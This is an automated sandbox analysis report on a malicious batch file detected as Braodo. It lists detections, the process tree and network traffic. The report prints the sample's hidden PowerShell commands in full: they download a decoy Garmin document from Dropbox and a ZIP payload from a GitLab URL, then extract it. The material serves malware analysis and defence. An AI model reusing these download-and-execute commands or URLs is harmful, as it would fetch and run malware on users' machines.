Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hngarm13de02.bat

Overview

General Information

Sample name:hngarm13de02.bat
Analysis ID:1576962
MD5:30d859593164bb2e5772ec1f0363b128
SHA1:c618d811df76a1012a7e6c3111f12518b89ba377
SHA256:72613d206cd2f91fae84304ffed26ff79abdadabaeca47d62e2e09697e5f16d9
Tags:batBraodofgsd1user-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 1608 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 3444 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 3192 cmdline: findstr /L /I set "C:\Users\user\Desktop\hngarm13de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2056 cmdline: findstr /L /I goto "C:\Users\user\Desktop\hngarm13de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3168 cmdline: findstr /L /I echo "C:\Users\user\Desktop\hngarm13de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2844 cmdline: findstr /L /I pause "C:\Users\user\Desktop\hngarm13de02.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 1696 cmdline: fInd MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 4416 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5216 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6024 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5408 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5064 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2800 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
hngarm13de02.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 6024JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 5064JoeSecurity_Braodo_1Yara detected BraodoJoe Security
        Process Memory Space: powershell.exe PID: 5064JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi64_6024.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_5064.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security
              amsi64_5064.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", ProcessId: 6024, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", ProcessId: 6024, ProcessName: powershell.exe
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5064, TargetFilename: C:\Users\Public\Document.zip
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2800, TargetFilename: C:\Users\Public\Document\Scripts\normalizer.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", ProcessId: 6024, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", ProcessId: 6024, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", ProcessId: 6024, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')", ProcessId: 6024, ProcessName: powershell.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
                Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: pip.exe.18.dr
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb*Gs source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76C7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: *.pdb source: powershell.exe, 0000000B.00000002.1744952074.0000022CB74E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76C7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76C7000.00000004.00000020.00020000.00000000.sdmp
                Source: global trafficHTTP traffic detected: GET /scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /fgsd1/gg/-/raw/main/FGa1312.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /fgsd1/gg/-/raw/main/FGa1312.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nPolicy: media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: e-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                Source: global trafficDNS traffic detected: DNS query: uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com
                Source: global trafficDNS traffic detected: DNS query: gitlab.com
                Source: powershell.exe, 00000012.00000002.2929895848.000001B1903C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 0000000B.00000002.1726663694.0000022CA0A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                Source: powershell.exe, 0000000D.00000002.2836573059.0000025134FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
